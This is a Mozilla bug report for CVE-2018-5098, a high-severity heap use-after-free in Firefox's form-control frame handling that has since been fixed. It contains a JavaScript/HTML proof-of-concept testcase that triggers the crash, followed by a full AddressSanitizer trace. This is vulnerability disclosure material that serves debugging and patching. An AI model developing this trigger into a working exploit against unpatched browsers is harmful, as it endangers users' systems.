Closed Bug 1399400 (CVE-2018-5098) Opened 7 years ago Closed 6 years ago

heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame

Categories

(Core :: DOM: Core & HTML, defect, P1)

52 Branch
defect

Tracking

()

VERIFIED FIXED
mozilla59
Tracking Status
firefox-esr52 58+ verified
firefox57 --- wontfix
firefox58 + verified
firefox59 + fixed

People

(Reporter: nils, Assigned: mrbkap)

Details

(Keywords: csectype-uaf, regressionwindow-wanted, sec-high, Whiteboard: [fixwindow-wanted][adv-main58+][adv-esr52.6+][post-critsmash-triage])

Attachments

(4 files, 2 obsolete files)

The following testcase crashes the latest ASAN build of Firefox ESR 52.3.1 (BuildID=20170912172710). It requires the fuzzPriv extension to trigger reliably.

<script>
function start() {
	o0=document.createElement('iframe');
	document.body.appendChild(o0);
	o1=window.open('data:text/html,<div><div><div>','popup35','height=134');
	o1.onload=fun0;
}
function fun0(e) {
	o5=e.target;
	o1.onresize=fun2;
	tmp=o5.getElementsByTagName('*');;
	o6=tmp[0];
	o7=tmp[1];
	o8=tmp[3];
	o15=document.createElement('input');
	o20=document.createElement('marquee');
	o20.addEventListener('DOMAttrModified',fun1);
	o8.appendChild(o20);
	o7.replaceWith(o15);
}
function fun1() {
	o15.type='number';
	o1.resizeTo(57,100);
	o5.removeChild(o6);
	o5.appendChild(o6);
	o15.select();
}
function fun2() {
	window.top.document.documentElement.appendChild(o15);
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==29513==ERROR: AddressSanitizer: heap-use-after-free on address 0x6150005339b0 at pc 0x7f51ef4b0479 bp 0x7ffdbbad88e0 sp 0x7ffdbbad88d8
READ of size 4 at 0x6150005339b0 thread T0
    #0 0x7f51ef4b0478 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12
    #1 0x7f51ef4b0478 in IsInUncomposedDoc /home/worker/workspace/build/src/dom/base/nsINode.h:526
    #2 0x7f51ef4b0478 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:916
    #3 0x7f51ef4b0478 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:964
    #4 0x7f51ef4b0478 in nsGenericHTMLElement::GetFormControlFrame(bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:1005
    #5 0x7f51ef3566ba in SelectAll /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3766:43
    #6 0x7f51ef3566ba in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3724
    #7 0x7f51ef3563b7 in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3688:14
    #8 0x7f51eea54770 in mozilla::dom::HTMLInputElementBinding::select(JSContext*, JS::Handle<JSObject*>, mozilla::dom::HTMLInputElement*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2769:3
    #9 0x7f51eed10399 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
    #10 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #11 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #12 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #13 0x7f51f4e043ac in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #14 0x7f51f4dd39df in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #15 0x7f51f4de14cf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #16 0x7f51f4de3c7e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #17 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #18 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #19 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #20 0x7f51f507548f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #21 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #22 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #23 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #24 0x7f51f4b66b8d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #25 0x7f51ee6fcd6c in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #26 0x7f51ef0f43e2 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
    #27 0x7f51ef0f43e2 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1130
    #28 0x7f51ef0f5e57 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #29 0x7f51ef0e0e79 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:401:9
    #30 0x7f51ef0e4248 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #31 0x7f51ef0e6147 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:780:12
    #32 0x7f51ed2d18f1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1309:5
    #33 0x7f51ef07eb16 in mozilla::AsyncEventDispatcher::Run() /home/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:54:3
    #34 0x7f51ecdd918e in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5195:5
    #35 0x7f51ed1d4cf4 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:4795:3
    #36 0x7f51ef4eff8c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2424:3
    #37 0x7f51f0eab795 in ~mozAutoDocConditionalContentUpdateBatch /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:83:7
    #38 0x7f51f0eab795 in nsDOMCSSDeclaration::ParsePropertyValue(nsCSSPropertyID, nsAString_internal const&, bool) /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:319
    #39 0x7f51ed6b157b in SetMargin /home/worker/workspace/build/src/layout/style/nsCSSPropList.h:2474:1
    #40 0x7f51ed6b157b in mozilla::dom::CSS2PropertiesBinding::set_margin(JSContext*, JS::Handle<JSObject*>, nsDOMCSSDeclaration*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:24459
    #41 0x7f51eed0f75c in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2865:8
    #42 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #43 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #44 0x7f51f5096dc8 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #45 0x7f51f5096dc8 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:650
    #46 0x7f51f50fc26d in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2434:10
    #47 0x7f51f50fc26d in js::NativeSetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::QualifiedBool, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2469
    #48 0x7f51f4dad9a8 in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1540:12
    #49 0x7f51f4dad9a8 in js::SetPropertyIgnoringNamedGetter(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::PropertyDescriptor>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/BaseProxyHandler.cpp:182
    #50 0x7f51eed1a985 in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) const /home/worker/workspace/build/src/dom/bindings/DOMJSProxyHandler.cpp:258:10
    #51 0x7f51f4ddfc31 in js::Proxy::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:333:12
    #52 0x7f51f4cbdb9a in JSObject::nonNativeSetProperty(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/jsobj.cpp:1022:12
    #53 0x7f51f506e16f in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1539:16
    #54 0x7f51f506e16f in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:259
    #55 0x7f51f506e16f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2715
    #56 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #57 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #58 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #59 0x7f51f4b64922 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #60 0x7f51f058736b in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3310:14
    #61 0x7f51f058736b in nsXBLProtoImplAnonymousMethod::Execute(nsIContent*, JSAddonId*) /home/worker/workspace/build/src/dom/xbl/nsXBLProtoImplMethod.cpp:331
    #62 0x7f51f0550f1e in nsXBLBinding::ExecuteAttachedHandler() /home/worker/workspace/build/src/dom/xbl/nsXBLBinding.cpp:634:5
    #63 0x7f51f0550d1e in nsBindingManager::ProcessAttachedQueueInternal(unsigned int) /home/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:419:7
    #64 0x7f51f137ce69 in ProcessAttachedQueue /home/worker/workspace/build/src/dom/xbl/nsBindingManager.h:105:5
    #65 0x7f51f137ce69 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4175
    #66 0x7f51f108e9dc in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #67 0x7f51f109b221 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #68 0x7f51f109acb5 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:316:5
    #69 0x7f51f109d7de in applyImpl<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByValue<mozilla::TimeStamp> , 0> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #70 0x7f51f109d7de in apply<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #71 0x7f51f109d7de in mozilla::detail::RunnableMethodImpl<void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #72 0x7f51ea58149b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #73 0x7f51ea6035dc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #74 0x7f51eb3bc25f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #75 0x7f51eb32ddb8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #76 0x7f51eb32ddb8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #77 0x7f51eb32ddb8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #78 0x7f51f09c29af in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #79 0x7f51f2a3ff71 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #80 0x7f51f2bd7287 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #81 0x7f51f2bd89fd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #82 0x7f51f2bd98bc in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #83 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #84 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #85 0x7f5205fca82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #86 0x41ba88 in _start (/fuzzer3/esr/firefox/firefox+0x41ba88)

0x6150005339b0 is located 48 bytes inside of 496-byte region [0x615000533980,0x615000533b70)
freed by thread T0 here:
    #0 0x4b21db in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f51ea449f34 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:9
    #2 0x7f51ea449b26 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
    #3 0x7f51ea450bfe in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3826:3
    #4 0x7f51ea4500bc in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3651:9
    #5 0x7f51ea454136 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4144:3
    #6 0x7f51ed2ed6c9 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
    #7 0x7f51ece173bd in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1340:3
    #8 0x7f51ea5a9aa6 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7f51ebdcec1e in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2058:12
    #10 0x7f51ebdcec1e in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1377
    #11 0x7f51ebdcec1e in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1344
    #12 0x7f51ebdd62a8 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1000:12
    #13 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #15 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #16 0x7f51f507548f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #17 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #18 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #19 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #20 0x7f51f4b64922 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #21 0x7f51ebcf65cf in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #23 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #24 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #25 0x7f51f507548f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #26 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #27 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #28 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #29 0x7f51f4e043ac in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f51f4dd39df in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #31 0x7f51f4de14cf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #32 0x7f51f4de3c7e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #33 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #34 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #35 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #36 0x7f51f4b66b8d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12

previously allocated by thread T0 here:
    #0 0x4b24fb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0ded in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f51ef3215a9 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f51ef3215a9 in NS_NewHTMLInputElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:129
    #4 0x7f51ef4c8456 in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:291:41
    #5 0x7f51ef4c8456 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:263
    #6 0x7f51ed226afe in nsIDocument::CreateHTMLElement(nsIAtom*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:12559:28
    #7 0x7f51f174853d in nsNumberControlFrame::MakeAnonymousElement(mozilla::dom::Element**, nsTArray<nsIAnonymousContentCreator::ContentInfo>&, nsIAtom*, mozilla::CSSPseudoElementType, nsStyleContext*) /home/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:333:35
    #8 0x7f51f174907b in nsNumberControlFrame::CreateAnonymousContent(nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:392:8
    #9 0x7f51f1197197 in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4228:17
    #10 0x7f51f1189b72 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10775:3
    #11 0x7f51f11a30a1 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4026:9
    #12 0x7f51f11ae196 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6196:3
    #13 0x7f51f118a8c4 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10640:5
    #14 0x7f51f118a8c4 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10852
    #15 0x7f51f11951ad in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11862:3
    #16 0x7f51f1191608 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2625:5
    #17 0x7f51f11b4876 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7753:7
    #18 0x7f51f137f815 in PresShell::ContentInserted(nsIDocument*, nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4427:3
    #19 0x7f51ed32d6de in nsNodeUtils::ContentInserted(nsINode*, nsIContent*, int) /home/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:201:3
    #20 0x7f51ed2d277e in nsINode::doInsertChildAt(nsIContent*, unsigned int, bool, nsAttrAndChildArray&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1630:7
    #21 0x7f51ed2d8ec6 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2514:14
    #22 0x7f51ed9ab98b in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1850:12
    #23 0x7f51ed9ab98b in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1854
    #24 0x7f51ed9ab98b in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle<JSObject*>, nsINode*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:696
    #25 0x7f51eed10399 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
    #26 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #27 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #28 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #29 0x7f51f4e043ac in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f51f4dd39df in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
